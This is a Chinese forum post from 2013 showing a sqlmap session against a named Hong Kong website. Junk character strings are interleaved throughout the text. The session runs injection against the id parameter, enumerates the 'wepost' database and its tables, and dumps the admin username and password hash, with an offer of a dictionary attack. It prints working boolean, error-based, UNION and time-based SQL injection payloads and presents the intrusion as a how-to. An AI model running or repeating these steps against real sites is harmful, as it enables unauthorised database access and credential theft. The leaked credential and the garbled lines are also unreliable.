标题:
sqlmap实例注入mysql
作者:
admin
时间:
2013-4-4 22:18
标题:
sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
2 [$ R, L5 Q/ g9 h8 b/ q
ms "Mysql" --current-user /* 注解:获取当前用户名称
$ E+ i+ v7 X5 z6 p6 r) J
sqlmap/0.9 - automatic SQL injection and database takeover tool
$ t3 ]. e3 S3 e( r1 `' [
http://sqlmap.sourceforge.net
starting at: 16:53:54
9 `3 E; y4 [5 F+ z1 u
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
: u8 Q' o! Q( c, J% n) ?/ P' k5 t% X4 u
session file
7 t2 {4 u4 I9 p; z" o$ d+ i
[16:53:54] [INFO] resuming injection data from session file
) ?1 @; c( k4 R' _* @; U/ c
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 D6 d% x3 K$ d$ A4 ?
[16:53:54] [INFO] testing connection to the target url
/ | K% ~3 o& D4 D0 {3 ^, F8 X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% ^8 K' m/ s, [$ Z5 D+ x. g1 R
sts:
- b5 a: r3 U1 x" T8 Z) w
---
8 a5 ]0 ^' a X+ [
Place: GET
% z. c& n* J. _$ v( b
Parameter: id
C$ n5 V! \' i
Type: boolean-based blind
2 d7 c* r8 X& Y
Title: AND boolean-based blind - WHERE or HAVING clause
3 v5 n( r3 C+ h0 [# j
Payload: id=276 AND 799=799
$ ?! X9 {+ c9 \
Type: error-based
W" l8 v5 \2 ^: E0 N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ z9 n. d* g" w6 l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# s# |( U& P$ B0 {; r. M
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 ?3 U2 m/ f/ ?- Y- m
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; C8 C; G& s9 ]5 M2 k
Type: UNION query
! D3 e) X. |* X# c0 Z, {- q7 g
Title: MySQL UNION query (NULL) - 1 to 10 columns
# y8 ?7 x; U. `# S, w
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
6 ?. U6 Q! ? |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" H. M( l: E. T/ W' |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
. R/ L$ {- r1 }3 ^
Type: AND/OR time-based blind
, o, C2 H6 g& l
Title: MySQL > 5.0.11 AND time-based blind
9 ~/ y+ E; L q* i l
Payload: id=276 AND SLEEP(5)
$ w- v8 \5 k6 u$ j- d. V9 l% E* z
---
- R) _: J: N& b& B; M9 a9 i
[16:53:55] [INFO] the back-end DBMS is MySQL
# m8 P3 v; v. l" e& y& X+ n' P
web server operating system: Windows
* s4 r, u0 N% J; \% U
web application technology: Apache 2.2.11, PHP 5.3.0
' g* l* I7 N' y- W% x: O
back-end DBMS: MySQL 5.0
3 V3 ]9 U/ Q8 ~# B* X6 B/ g
[16:53:55] [INFO] fetching current user
! T6 n+ e$ H% W1 }
current user: 'root@localhost'
2 j* `# A! R% e/ | B% c9 y: ]
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
6 H; f" Q6 W# Y$ T ~% B4 `9 S5 A0 s
tput\
www.wepost.com.hk
'
shutting down at: 16:53:58
3 h8 M8 q& x3 k( p1 l |2 U9 M
/ N' Q. m" Q6 c% u8 ]
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
l1 c1 y9 D* q0 t; ~, ~* U
ms "Mysql" --current-db /*当前数据库
! b1 W, k. K7 P) q2 `& v% c
sqlmap/0.9 - automatic SQL injection and database takeover tool
) v: ~& s) m6 T) M' ]2 O0 H1 \
http://sqlmap.sourceforge.net
starting at: 16:54:16
9 F* H8 y# A/ V5 X
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
( c* R+ N/ M% Q) E7 g D- P* {
session file
4 _2 k& q0 g5 }0 E: D" {" W, T1 I; F
[16:54:16] [INFO] resuming injection data from session file
, C) ~. V" V. `# V3 l
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ m* D. i# D% C4 s0 Q
[16:54:16] [INFO] testing connection to the target url
9 d4 h! D( w" V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
A/ c+ L; |; P, S2 v
sts:
- [; h, x \; p, \
---
% a* u1 s; r! z5 x$ \
Place: GET
: [* q O9 D+ t
Parameter: id
; c8 I' x+ A/ n1 P- T/ v
Type: boolean-based blind
1 t' J' L2 `) Q' ^
Title: AND boolean-based blind - WHERE or HAVING clause
4 e) x! Z! w0 K$ d: V0 l( L
Payload: id=276 AND 799=799
5 c2 P7 D, V. X w. m
Type: error-based
; c; P g4 I0 @
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
B; b; s2 V/ B; |! c% a: S
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; f2 {& D( D: m" T1 E$ i
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 T- O3 v" O$ e5 D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# `! v C% B+ N. p
Type: UNION query
5 w8 P. x' p) f# O9 W5 h- J, \/ w
Title: MySQL UNION query (NULL) - 1 to 10 columns
) ~6 `7 S& _. z S
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" Y; f9 V, i7 L2 x/ m) K* K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( I; \( ]% ?9 k* V3 W+ u" Z7 s5 f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
: i% d( Z4 v& l- |' Y, O' I
Type: AND/OR time-based blind
' }. x9 y# g+ h
Title: MySQL > 5.0.11 AND time-based blind
/ o# D8 j, x' R! s$ J- {! J
Payload: id=276 AND SLEEP(5)
s% A$ R# p! h8 f
---
7 H! q; l2 s: `- V
[16:54:17] [INFO] the back-end DBMS is MySQL
8 @" H+ L- @$ X, S4 L& D I4 [9 P0 V
web server operating system: Windows
0 X- n$ O t% M( ^3 d1 l
web application technology: Apache 2.2.11, PHP 5.3.0
: D% }" {, r* D& H. ^! j& o
back-end DBMS: MySQL 5.0
' z+ y& E) G8 v% K% c' P
[16:54:17] [INFO] fetching current database
5 p7 ^0 ~0 h0 H4 W7 b( g
current database: 'wepost'
# U9 P9 J0 \8 y a8 I
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
( m# |5 P6 T% z
tput\
www.wepost.com.hk
'
shutting down at: 16:54:18
& I- O, X2 o' f. }" L
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
# W" C" I1 o$ ]
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
3 Z1 N6 \/ c; n1 r; A
sqlmap/0.9 - automatic SQL injection and database takeover tool
( c! j- k8 c+ A* X
http://sqlmap.sourceforge.net
starting at: 16:55:25
0 V+ g/ y+ o+ z/ r" K M8 x8 j) I( o
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
! t% q5 X7 X* s# y
session file
" Q# D% B3 g( j: n
[16:55:25] [INFO] resuming injection data from session file
) R- c9 m+ \) M5 k/ l" j! U
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
% z0 P0 Y, a0 @$ [
[16:55:25] [INFO] testing connection to the target url
$ T: }% [# j' G; o; Y6 J- N/ X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ D) Z! q0 \$ ~. t% g8 @6 o
sts:
# I2 @1 r) H( b, N
---
" h4 @3 O3 k) o& v
Place: GET
% o# e" t: B9 P* d
Parameter: id
. }) H/ W! e6 u7 e# t- H
Type: boolean-based blind
) _+ Y* I; Z9 G6 `, x
Title: AND boolean-based blind - WHERE or HAVING clause
0 W. U. G* s9 o- l
Payload: id=276 AND 799=799
2 S3 l0 ?$ J Q" E1 w$ G3 I3 C
Type: error-based
* A. A0 K5 k7 I; i2 E# z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 n) u, o; Y$ t* F0 [
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! w& [8 C+ T& \0 z2 c1 A9 S9 d
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ \7 l5 y Q5 o+ M S' K: B1 A
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ G+ [( {- W0 J; } ^3 z
Type: UNION query
, ] C. Q# f+ P P' q# T
Title: MySQL UNION query (NULL) - 1 to 10 columns
* L! p/ E- V! Z* T$ E
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. {. }% I2 Z# V! K- }+ x* {" D
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ y' G3 K1 F6 G
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 c3 S3 z. ^# ?* D; v1 t
Type: AND/OR time-based blind
- X. Z9 k% f: y
Title: MySQL > 5.0.11 AND time-based blind
4 R! y6 n W W# c; i2 l4 Z- x6 Z
Payload: id=276 AND SLEEP(5)
' \% v& F. G/ _! H8 l
---
7 c% J5 j% h$ u. y1 r
[16:55:26] [INFO] the back-end DBMS is MySQL
4 |/ d4 F) `2 _$ _/ C o
web server operating system: Windows
' @& f1 ~; m! j. h1 f" L3 k1 a
web application technology: Apache 2.2.11, PHP 5.3.0
1 I! t1 P0 w$ K5 p9 L
back-end DBMS: MySQL 5.0
2 u0 T. M! `; }6 r) Z3 k, t: }
[16:55:26] [INFO] fetching tables for database 'wepost'
. x- u& e) P% Q" r7 x
[16:55:27] [INFO] the SQL query used returns 6 entries
8 V+ n2 O4 o. ^2 w) c- {; T
Database: wepost
- x: P/ y1 X' T/ Z2 {
[6 tables]
a$ S: P( J. V: u( q1 ]
+-------------+
7 S2 c* |. _; H0 j
| admin |
7 h- V4 H8 e$ {, [+ b
| article |
! u- p H: u; Z! ?2 U+ \+ K
| contributor |
. M6 f$ T9 g+ G7 V2 e
| idea |
" H0 O( R% g/ f1 F; V1 w) l
| image |
8 U- k5 f4 V$ i
| issue |
: r5 X9 s& R, X1 U2 ^" |$ Q" j0 g* `
+-------------+
: o1 ]5 z; \; N
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 q& ]9 c Z N4 h1 V6 n9 `
tput\
www.wepost.com.hk
'
shutting down at: 16:55:33
$ ~" o' E+ M5 s9 M1 v( ?* W/ Q) ^
' \, w. c$ y$ b% a3 x7 X8 ]
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
" |9 M1 T2 a% M- ~
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
2 v, K( R) _4 A+ Y1 u; y
sqlmap/0.9 - automatic SQL injection and database takeover tool
' O% O5 ]( \, { l2 C) P
http://sqlmap.sourceforge.net
starting at: 16:56:06
( i6 x. G7 t6 i+ G. j
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 v) [2 i' ?4 Z
sts:
* B4 A1 B/ k$ w. o
---
! c( W7 K. X" d; x9 u
Place: GET
! k5 s! {, Y: v8 M
Parameter: id
( c: O" ~- ]9 ~8 A- }8 e8 \
Type: boolean-based blind
6 W! g+ s7 u- i" X1 f
Title: AND boolean-based blind - WHERE or HAVING clause
8 J, L( {# G8 U* K
Payload: id=276 AND 799=799
; }! U4 P0 I& V0 P+ ?& J
Type: error-based
( `/ E7 ^4 h3 ~
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- @8 z9 Q# J: e3 T6 V7 _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: N6 U" t$ N* ~4 ^
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 Q! h" y3 g# }3 S5 e3 {
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# l5 s9 u" v5 h0 B
Type: UNION query
1 ^3 ]; w' B2 Y8 J) L4 c
Title: MySQL UNION query (NULL) - 1 to 10 columns
# [* H/ T) H' t/ d# X1 D% h2 r
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# c! A/ s" S E& s! n1 @2 i
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& Y* j2 J( w8 J. M8 Z9 l: t6 I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 {2 C" u! I8 g/ D2 R: {
Type: AND/OR time-based blind
( n/ U4 ]/ P" G: I, b7 W
Title: MySQL > 5.0.11 AND time-based blind
$ H# M- D5 F5 d8 [1 X# [
Payload: id=276 AND SLEEP(5)
5 Q: f% ^. Y* o, N: c
---
$ K! x9 ^, q' r3 Y+ h
web server operating system: Windows
. j/ N, l2 \5 x5 S, d0 d
web application technology: Apache 2.2.11, PHP 5.3.0
l0 q5 a7 O7 ~* f# T6 w3 j y2 ]: u
back-end DBMS: MySQL 5.0
9 o0 M5 c; _" L! _- `5 N
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\se
& o& p* x+ o0 R9 V3 X
ssion': wepost, wepost
2 p3 ]4 K5 W# [' y( ~5 L
Database: wepost
! w5 \- a, }0 ^0 Y# l
Table: admin
$ x7 A% S7 a; T5 Z
[4 columns]
/ M6 [) }0 \% K1 d( }- g J. }- X e
+----------+-------------+
& N+ S4 G6 @8 f% N+ N4 }$ p
| Column | Type |
- w4 w4 e. U7 `4 z5 k3 c. S
+----------+-------------+
9 A' I Q/ q) }5 w ~ G
| id | int(11) |
) q4 f- O' j! S" [2 j F+ [' h3 S
| password | varchar(32) |
8 T, m. [( V @2 O! R! ?
| type | varchar(10) |
' [$ ^' V- ~2 a1 Y! d1 B3 w
| userid | varchar(20) |
+ v0 N0 g& o; c. n
+----------+-------------+
6 M/ x$ k% _; V5 C6 q$ j
shutting down at: 16:56:19
, q( Y; E7 J8 _. ]% L% m6 C- p; k2 p
$ P( N/ R B r5 a, G1 @2 H& C, h+ j
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
) x9 G/ g; F) M( X& e
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
& _* L% i7 T; y% ]7 N! y
sqlmap/0.9 - automatic SQL injection and database takeover tool
8 r* c3 v0 S C5 `
http://sqlmap.sourceforge.net
starting at: 16:57:14
: {( C& A& D6 h6 ]1 n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 U2 U5 {% v; G( L- p' e
sts:
7 n Y4 _ w: Z
---
/ y" x/ D7 A' x$ F
Place: GET
0 s9 X1 _1 G$ k; ^8 \9 N9 F u
Parameter: id
' o1 \- d% a1 W3 f" ]7 }) l+ ~# d- ?7 j
Type: boolean-based blind
~3 ?; x" K/ Y
Title: AND boolean-based blind - WHERE or HAVING clause
' K/ J- N: J- m! [7 o
Payload: id=276 AND 799=799
Z! h! r2 U" ]' y- J1 F
Type: error-based
+ j9 d$ c# k( [- M
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ A; I+ x3 G8 h, K& V; Y/ v" w
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 K+ A& J3 S; y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 P: t' E2 T; m, r8 t: C; T2 W
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 ?1 g+ y% i/ L b0 R9 H
Type: UNION query
. t' w0 ~/ F: C$ z2 U
Title: MySQL UNION query (NULL) - 1 to 10 columns
. `4 \$ [ x# J* F1 I) _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 O3 ~ f, ?! F9 Z7 s
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 B1 }1 f; Z( ]* L7 d5 g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- b+ p5 K1 c+ u/ A! M
Type: AND/OR time-based blind
+ @* G, K% C1 Y3 _) j
Title: MySQL > 5.0.11 AND time-based blind
% L" `" Q. Q4 P' b6 T
Payload: id=276 AND SLEEP(5)
: y, h4 x1 q5 |' K; x4 L4 W
---
/ N5 A4 B. X8 r2 y+ k( c
web server operating system: Windows
! U9 S0 s& y: s/ C3 A! a
web application technology: Apache 2.2.11, PHP 5.3.0
8 P: O. d+ L$ f/ B5 z! j) E
back-end DBMS: MySQL 5.0
: r# m+ w( ]1 x) W
recognized possible password hash values. do you want to use dictionary attack o
9 U+ x4 C( q( u! c5 Y X( e# _
n retrieved table items? [Y/n/q] y
! T8 F# N! I. v
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
$ B; g0 K3 @& Q
do you want to use common password suffixes? (slow!) [y/N] y
0 g2 ~+ c$ ~! n+ b! `4 Y; ^
Database: wepost
; i! D2 E4 ?6 _8 V
Table: admin
! E C! l$ n0 X0 k* M2 M8 b
[1 entry]
" B. D5 h/ p5 a" \! J, o9 z
+----------------------------------+------------+
( {) h1 O3 a& |; F8 i% e
| password | userid |
( g* o V2 `) b* x2 X; X! m+ {9 R" }
+----------------------------------+------------+
7 @% V6 r1 n8 v0 W- j: Q$ C" ?
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
" C* |+ |3 B/ X+ u% D
+----------------------------------+------------+
. {) I5 t. h% u1 G; V3 s2 F6 D5 ?
shutting down at: 16:58:14
; i, _( X4 d( U$ b5 f+ f0 g0 b
: w; n& b& h6 b& t
D:\Python27\sqlmap>